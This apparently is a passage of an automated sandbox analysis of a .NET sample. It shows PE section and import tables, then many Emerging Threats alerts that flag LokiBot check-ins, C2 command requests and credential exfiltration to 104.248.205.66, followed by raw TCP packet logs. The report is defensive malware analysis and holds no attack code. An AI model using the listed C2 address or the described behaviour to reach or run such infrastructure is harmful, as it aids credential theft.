                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x91e200x4b.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x5e0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x90a000x3608
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x91ddc0x1c.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x8fe740x9000000693e578353177a88b02570d59f434eFalse0.9050835503472222data7.801340855529023IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0x920000x5e00x60012115f8fcc0007896de436c4ffde53ddFalse0.4388020833333333data4.168041492900222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x940000xc0x20062fe13956a105475f417750ff7d0504cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_VERSION0x920a00x354data0.43661971830985913
                        RT_MANIFEST0x923f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                        DLLImport
                        mscoree.dll_CorExeMain
                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                        2024-08-29T12:03:19.308276+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973180192.168.2.8104.248.205.66
                        2024-08-29T12:03:19.308276+0200TCP2025381ET MALWARE LokiBot Checkin14973180192.168.2.8104.248.205.66
                        2024-08-29T12:03:03.565317+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14972580192.168.2.8104.248.205.66
                        2024-08-29T12:03:03.565317+0200TCP2025381ET MALWARE LokiBot Checkin14972580192.168.2.8104.248.205.66
                        2024-08-29T12:04:29.944426+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975980192.168.2.8104.248.205.66
                        2024-08-29T12:04:29.944426+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975980192.168.2.8104.248.205.66
                        2024-08-29T12:03:01.038490+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14972380192.168.2.8104.248.205.66
                        2024-08-29T12:03:01.038490+0200TCP2025381ET MALWARE LokiBot Checkin14972380192.168.2.8104.248.205.66
                        2024-08-29T12:04:44.823782+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14976680192.168.2.8104.248.205.66
                        2024-08-29T12:04:44.823782+0200TCP2025381ET MALWARE LokiBot Checkin14976680192.168.2.8104.248.205.66
                        2024-08-29T12:03:14.298157+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14972980192.168.2.8104.248.205.66
                        2024-08-29T12:03:14.298157+0200TCP2025381ET MALWARE LokiBot Checkin14972980192.168.2.8104.248.205.66
                        2024-08-29T12:03:16.846754+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973080192.168.2.8104.248.205.66
                        2024-08-29T12:03:16.846754+0200TCP2025381ET MALWARE LokiBot Checkin14973080192.168.2.8104.248.205.66
                        2024-08-29T12:04:14.840104+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975380192.168.2.8104.248.205.66
                        2024-08-29T12:04:14.840104+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975380192.168.2.8104.248.205.66
                        2024-08-29T12:04:32.405549+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114976080192.168.2.8104.248.205.66
                        2024-08-29T12:04:32.405549+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214976080192.168.2.8104.248.205.66
                        2024-08-29T12:03:11.041687+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114972780192.168.2.8104.248.205.66
                        2024-08-29T12:03:11.041687+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214972780192.168.2.8104.248.205.66
                        2024-08-29T12:03:29.282132+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973580192.168.2.8104.248.205.66
                        2024-08-29T12:03:29.282132+0200TCP2025381ET MALWARE LokiBot Checkin14973580192.168.2.8104.248.205.66
                        2024-08-29T12:03:05.911113+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114972580192.168.2.8104.248.205.66
                        2024-08-29T12:03:05.911113+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214972580192.168.2.8104.248.205.66
                        2024-08-29T12:03:06.065702+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14972680192.168.2.8104.248.205.66
                        2024-08-29T12:03:06.065702+0200TCP2025381ET MALWARE LokiBot Checkin14972680192.168.2.8104.248.205.66
                        2024-08-29T12:04:20.114259+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975680192.168.2.8104.248.205.66
                        2024-08-29T12:04:20.114259+0200TCP2025381ET MALWARE LokiBot Checkin14975680192.168.2.8104.248.205.66
                        2024-08-29T12:04:07.063527+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975080192.168.2.8104.248.205.66
                        2024-08-29T12:04:07.063527+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975080192.168.2.8104.248.205.66
                        2024-08-29T12:03:16.695709+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114972980192.168.2.8104.248.205.66
                        2024-08-29T12:03:16.695709+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214972980192.168.2.8104.248.205.66
                        2024-08-29T12:04:25.029294+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975780192.168.2.8104.248.205.66
                        2024-08-29T12:04:25.029294+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975780192.168.2.8104.248.205.66
                        2024-08-29T12:03:24.159761+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973280192.168.2.8104.248.205.66
                        2024-08-29T12:03:24.159761+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973280192.168.2.8104.248.205.66
                        2024-08-29T12:03:54.762512+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974580192.168.2.8104.248.205.66
                        2024-08-29T12:03:54.762512+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974580192.168.2.8104.248.205.66
                        2024-08-29T12:03:29.124410+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973480192.168.2.8104.248.205.66
                        2024-08-29T12:03:29.124410+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973480192.168.2.8104.248.205.66
                        2024-08-29T12:04:39.676820+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114976380192.168.2.8104.248.205.66
                        2024-08-29T12:04:39.676820+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214976380192.168.2.8104.248.205.66
                        2024-08-29T12:02:56.085560+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14971580192.168.2.8104.248.205.66
                        2024-08-29T12:02:56.085560+0200TCP2025381ET MALWARE LokiBot Checkin14971580192.168.2.8104.248.205.66
                        2024-08-29T12:03:26.573742+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973380192.168.2.8104.248.205.66
                        2024-08-29T12:03:26.573742+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973380192.168.2.8104.248.205.66
                        2024-08-29T12:04:37.279739+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114976280192.168.2.8104.248.205.66
                        2024-08-29T12:04:37.279739+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214976280192.168.2.8104.248.205.66
                        2024-08-29T12:03:24.315194+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973380192.168.2.8104.248.205.66
                        2024-08-29T12:03:24.315194+0200TCP2025381ET MALWARE LokiBot Checkin14973380192.168.2.8104.248.205.66
                        2024-08-29T12:02:53.568454+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14971480192.168.2.8104.248.205.66
                        2024-08-29T12:02:53.568454+0200TCP2025381ET MALWARE LokiBot Checkin14971480192.168.2.8104.248.205.66
                        2024-08-29T12:03:11.192104+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14972880192.168.2.8104.248.205.66
                        2024-08-29T12:03:11.192104+0200TCP2025381ET MALWARE LokiBot Checkin14972880192.168.2.8104.248.205.66
                        2024-08-29T12:04:17.720151+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975580192.168.2.8104.248.205.66
                        2024-08-29T12:04:17.720151+0200TCP2025381ET MALWARE LokiBot Checkin14975580192.168.2.8104.248.205.66
                        2024-08-29T12:03:54.915658+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974680192.168.2.8104.248.205.66
                        2024-08-29T12:03:54.915658+0200TCP2025381ET MALWARE LokiBot Checkin14974680192.168.2.8104.248.205.66
                        2024-08-29T12:03:08.690898+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14972780192.168.2.8104.248.205.66
                        2024-08-29T12:03:08.690898+0200TCP2025381ET MALWARE LokiBot Checkin14972780192.168.2.8104.248.205.66
                        2024-08-29T12:03:59.879049+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974880192.168.2.8104.248.205.66
                        2024-08-29T12:03:59.879049+0200TCP2025381ET MALWARE LokiBot Checkin14974880192.168.2.8104.248.205.66
                        2024-08-29T12:03:57.235849+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974680192.168.2.8104.248.205.66
                        2024-08-29T12:03:57.235849+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974680192.168.2.8104.248.205.66
                        2024-08-29T12:03:08.538051+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114972680192.168.2.8104.248.205.66
                        2024-08-29T12:03:08.538051+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214972680192.168.2.8104.248.205.66
                        2024-08-29T12:03:31.573054+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973580192.168.2.8104.248.205.66
                        2024-08-29T12:03:31.573054+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973580192.168.2.8104.248.205.66
                        2024-08-29T12:03:52.278473+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974480192.168.2.8104.248.205.66
                        2024-08-29T12:03:52.278473+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974480192.168.2.8104.248.205.66
                        2024-08-29T12:03:31.850643+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973680192.168.2.8104.248.205.66
                        2024-08-29T12:03:31.850643+0200TCP2025381ET MALWARE LokiBot Checkin14973680192.168.2.8104.248.205.66
                        2024-08-29T12:04:30.099350+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14976080192.168.2.8104.248.205.66
                        2024-08-29T12:04:30.099350+0200TCP2025381ET MALWARE LokiBot Checkin14976080192.168.2.8104.248.205.66
                        2024-08-29T12:04:09.894995+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975280192.168.2.8104.248.205.66
                        2024-08-29T12:04:09.894995+0200TCP2025381ET MALWARE LokiBot Checkin14975280192.168.2.8104.248.205.66
                        2024-08-29T12:03:34.483482+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973780192.168.2.8104.248.205.66
                        2024-08-29T12:03:34.483482+0200TCP2025381ET MALWARE LokiBot Checkin14973780192.168.2.8104.248.205.66
                        2024-08-29T12:04:37.441389+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14976380192.168.2.8104.248.205.66
                        2024-08-29T12:04:37.441389+0200TCP2025381ET MALWARE LokiBot Checkin14976380192.168.2.8104.248.205.66
                        2024-08-29T12:03:57.393911+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974780192.168.2.8104.248.205.66
                        2024-08-29T12:03:57.393911+0200TCP2025381ET MALWARE LokiBot Checkin14974780192.168.2.8104.248.205.66
                        2024-08-29T12:04:04.783249+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975080192.168.2.8104.248.205.66
                        2024-08-29T12:04:04.783249+0200TCP2025381ET MALWARE LokiBot Checkin14975080192.168.2.8104.248.205.66
                        2024-08-29T12:04:42.108847+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114976480192.168.2.8104.248.205.66
                        2024-08-29T12:04:42.108847+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214976480192.168.2.8104.248.205.66
                        2024-08-29T12:02:56.010523+0200TCP2024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M114971480192.168.2.8104.248.205.66
                        2024-08-29T12:04:02.379636+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974980192.168.2.8104.248.205.66
                        2024-08-29T12:04:02.379636+0200TCP2025381ET MALWARE LokiBot Checkin14974980192.168.2.8104.248.205.66
                        2024-08-29T12:03:42.412382+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974080192.168.2.8104.248.205.66
                        2024-08-29T12:03:42.412382+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974080192.168.2.8104.248.205.66
                        2024-08-29T12:04:19.961465+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975580192.168.2.8104.248.205.66
                        2024-08-29T12:04:19.961465+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975580192.168.2.8104.248.205.66
                        2024-08-29T12:04:34.819178+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114976180192.168.2.8104.248.205.66
                        2024-08-29T12:04:34.819178+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214976180192.168.2.8104.248.205.66
                        2024-08-29T12:04:44.658105+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114976580192.168.2.8104.248.205.66
                        2024-08-29T12:04:44.658105+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214976580192.168.2.8104.248.205.66
                        2024-08-29T12:03:34.162896+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973680192.168.2.8104.248.205.66
                        2024-08-29T12:03:34.162896+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973680192.168.2.8104.248.205.66
                        2024-08-29T12:03:39.972478+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973880192.168.2.8104.248.205.66
                        2024-08-29T12:03:39.972478+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973880192.168.2.8104.248.205.66
                        2024-08-29T12:04:39.833421+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14976480192.168.2.8104.248.205.66
                        2024-08-29T12:04:39.833421+0200TCP2025381ET MALWARE LokiBot Checkin14976480192.168.2.8104.248.205.66
                        2024-08-29T12:03:14.151085+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114972880192.168.2.8104.248.205.66
                        2024-08-29T12:03:14.151085+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214972880192.168.2.8104.248.205.66
                        2024-08-29T12:03:21.616215+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973180192.168.2.8104.248.205.66
                        2024-08-29T12:03:21.616215+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973180192.168.2.8104.248.205.66
                        2024-08-29T12:02:51.197441+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14971380192.168.2.8104.248.205.66
                        2024-08-29T12:02:51.197441+0200TCP2025381ET MALWARE LokiBot Checkin14971380192.168.2.8104.248.205.66
                        2024-08-29T12:02:53.422002+0200TCP2024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M114971380192.168.2.8104.248.205.66
                        2024-08-29T12:04:27.434952+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975880192.168.2.8104.248.205.66
                        2024-08-29T12:04:27.434952+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975880192.168.2.8104.248.205.66
                        2024-08-29T12:03:26.720005+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973480192.168.2.8104.248.205.66
                        2024-08-29T12:03:26.720005+0200TCP2025381ET MALWARE LokiBot Checkin14973480192.168.2.8104.248.205.66
                        2024-08-29T12:04:22.379291+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975680192.168.2.8104.248.205.66
                        2024-08-29T12:04:22.379291+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975680192.168.2.8104.248.205.66
                        2024-08-29T12:03:37.503478+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973880192.168.2.8104.248.205.66
                        2024-08-29T12:03:37.503478+0200TCP2025381ET MALWARE LokiBot Checkin14973880192.168.2.8104.248.205.66
                        2024-08-29T12:04:34.970294+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14976280192.168.2.8104.248.205.66
                        2024-08-29T12:04:34.970294+0200TCP2025381ET MALWARE LokiBot Checkin14976280192.168.2.8104.248.205.66
                        2024-08-29T12:04:25.191402+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975880192.168.2.8104.248.205.66
                        2024-08-29T12:04:25.191402+0200TCP2025381ET MALWARE LokiBot Checkin14975880192.168.2.8104.248.205.66
                        2024-08-29T12:04:04.631989+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974980192.168.2.8104.248.205.66
                        2024-08-29T12:04:04.631989+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974980192.168.2.8104.248.205.66
                        2024-08-29T12:02:58.527194+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114971580192.168.2.8104.248.205.66
                        2024-08-29T12:02:58.527194+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214971580192.168.2.8104.248.205.66
                        2024-08-29T12:03:00.883637+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114971680192.168.2.8104.248.205.66
                        2024-08-29T12:03:00.883637+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214971680192.168.2.8104.248.205.66
                        2024-08-29T12:04:07.250483+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975180192.168.2.8104.248.205.66
                        2024-08-29T12:04:07.250483+0200TCP2025381ET MALWARE LokiBot Checkin14975180192.168.2.8104.248.205.66
                        2024-08-29T12:03:03.415827+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114972380192.168.2.8104.248.205.66
                        2024-08-29T12:03:03.415827+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214972380192.168.2.8104.248.205.66
                        2024-08-29T12:04:17.573612+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975480192.168.2.8104.248.205.66
                        2024-08-29T12:04:17.573612+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975480192.168.2.8104.248.205.66
                        2024-08-29T12:04:22.534398+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975780192.168.2.8104.248.205.66
                        2024-08-29T12:04:22.534398+0200TCP2025381ET MALWARE LokiBot Checkin14975780192.168.2.8104.248.205.66
                        2024-08-29T12:04:27.594258+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975980192.168.2.8104.248.205.66
                        2024-08-29T12:04:27.594258+0200TCP2025381ET MALWARE LokiBot Checkin14975980192.168.2.8104.248.205.66
                        2024-08-29T12:03:50.004455+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974480192.168.2.8104.248.205.66
                        2024-08-29T12:03:50.004455+0200TCP2025381ET MALWARE LokiBot Checkin14974480192.168.2.8104.248.205.66
                        2024-08-29T12:03:47.563972+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974380192.168.2.8104.248.205.66
                        2024-08-29T12:03:47.563972+0200TCP2025381ET MALWARE LokiBot Checkin14974380192.168.2.8104.248.205.66
                        2024-08-29T12:04:32.566846+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14976180192.168.2.8104.248.205.66
                        2024-08-29T12:04:32.566846+0200TCP2025381ET MALWARE LokiBot Checkin14976180192.168.2.8104.248.205.66
                        2024-08-29T12:04:49.551951+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114976780192.168.2.8104.248.205.66
                        2024-08-29T12:04:49.551951+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214976780192.168.2.8104.248.205.66
                        2024-08-29T12:03:37.353714+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973780192.168.2.8104.248.205.66
                        2024-08-29T12:03:37.353714+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973780192.168.2.8104.248.205.66
                        2024-08-29T12:04:47.295065+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14976780192.168.2.8104.248.205.66
                        2024-08-29T12:04:47.295065+0200TCP2025381ET MALWARE LokiBot Checkin14976780192.168.2.8104.248.205.66
                        2024-08-29T12:02:58.674545+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14971680192.168.2.8104.248.205.66
                        2024-08-29T12:02:58.674545+0200TCP2025381ET MALWARE LokiBot Checkin14971680192.168.2.8104.248.205.66
                        2024-08-29T12:04:02.225701+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974880192.168.2.8104.248.205.66
                        2024-08-29T12:04:02.225701+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974880192.168.2.8104.248.205.66
                        2024-08-29T12:03:47.408084+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974280192.168.2.8104.248.205.66
                        2024-08-29T12:03:47.408084+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974280192.168.2.8104.248.205.66
                        2024-08-29T12:04:47.124603+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114976680192.168.2.8104.248.205.66
                        2024-08-29T12:04:47.124603+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214976680192.168.2.8104.248.205.66
                        2024-08-29T12:04:12.157744+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975280192.168.2.8104.248.205.66
                        2024-08-29T12:04:12.157744+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975280192.168.2.8104.248.205.66
                        2024-08-29T12:04:12.552431+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975380192.168.2.8104.248.205.66
                        2024-08-29T12:04:12.552431+0200TCP2025381ET MALWARE LokiBot Checkin14975380192.168.2.8104.248.205.66
                        2024-08-29T12:03:19.141350+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114973080192.168.2.8104.248.205.66
                        2024-08-29T12:03:19.141350+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214973080192.168.2.8104.248.205.66
                        2024-08-29T12:03:52.443390+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974580192.168.2.8104.248.205.66
                        2024-08-29T12:03:52.443390+0200TCP2025381ET MALWARE LokiBot Checkin14974580192.168.2.8104.248.205.66
                        2024-08-29T12:03:42.563782+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974180192.168.2.8104.248.205.66
                        2024-08-29T12:03:42.563782+0200TCP2025381ET MALWARE LokiBot Checkin14974180192.168.2.8104.248.205.66
                        2024-08-29T12:03:40.138811+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974080192.168.2.8104.248.205.66
                        2024-08-29T12:03:40.138811+0200TCP2025381ET MALWARE LokiBot Checkin14974080192.168.2.8104.248.205.66
                        2024-08-29T12:03:21.768470+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14973280192.168.2.8104.248.205.66
                        2024-08-29T12:03:21.768470+0200TCP2025381ET MALWARE LokiBot Checkin14973280192.168.2.8104.248.205.66
                        2024-08-29T12:04:42.267991+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14976580192.168.2.8104.248.205.66
                        2024-08-29T12:04:42.267991+0200TCP2025381ET MALWARE LokiBot Checkin14976580192.168.2.8104.248.205.66
                        2024-08-29T12:03:59.722184+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974780192.168.2.8104.248.205.66
                        2024-08-29T12:03:59.722184+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974780192.168.2.8104.248.205.66
                        2024-08-29T12:03:44.843250+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974180192.168.2.8104.248.205.66
                        2024-08-29T12:03:44.843250+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974180192.168.2.8104.248.205.66
                        2024-08-29T12:03:49.848265+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114974380192.168.2.8104.248.205.66
                        2024-08-29T12:03:49.848265+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214974380192.168.2.8104.248.205.66
                        2024-08-29T12:03:45.003825+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14974280192.168.2.8104.248.205.66
                        2024-08-29T12:03:45.003825+0200TCP2025381ET MALWARE LokiBot Checkin14974280192.168.2.8104.248.205.66
                        2024-08-29T12:04:15.293513+0200TCP2021641ET MALWARE LokiBot User-Agent (Charon/Inferno)14975480192.168.2.8104.248.205.66
                        2024-08-29T12:04:15.293513+0200TCP2025381ET MALWARE LokiBot Checkin14975480192.168.2.8104.248.205.66
                        2024-08-29T12:04:09.482496+0200TCP2024313ET MALWARE LokiBot Request for C2 Commands Detected M114975180192.168.2.8104.248.205.66
                        2024-08-29T12:04:09.482496+0200TCP2024318ET MALWARE LokiBot Request for C2 Commands Detected M214975180192.168.2.8104.248.205.66
                        TimestampSource PortDest PortSource IPDest IP
                        Aug 29, 2024 12:02:51.185045004 CEST4971380192.168.2.8104.248.205.66
                        Aug 29, 2024 12:02:51.189851999 CEST8049713104.248.205.66192.168.2.8
                        Aug 29, 2024 12:02:51.189927101 CEST4971380192.168.2.8104.248.205.66
                        Aug 29, 2024 12:02:51.192383051 CEST4971380192.168.2.8104.248.205.66
                        Aug 29, 2024 12:02:51.197324038 CEST8049713104.248.205.66192.168.2.8
                        Aug 29, 2024 12:02:51.197441101 CEST4971380192.168.2.8104.248.205.66
                        Aug 29, 2024 12:02:51.202373981 CEST8049713104.248.205.66192.168.2.8
                        Aug 29, 2024 12:02:53.421875000 CEST8049713104.248.205.66192.168.2.8
                        Aug 29, 2024 12:02:53.421946049 CEST8049713104.248.205.66192.168.2.8
                        Aug 29, 2024 12:02:53.422002077 CEST4971380192.168.2.8104.248.205.66
                        Aug 29, 2024 12:02:53.422004938 CEST8049713104.248.205.66192.168.2.8
                        Aug 29, 2024 12:02:53.422019005 CEST8049713104.248.205.66192.168.2.8
                        Aug 29, 2024 12:02:53.422070980 CEST4971380192.168.2.8104.248.205.66
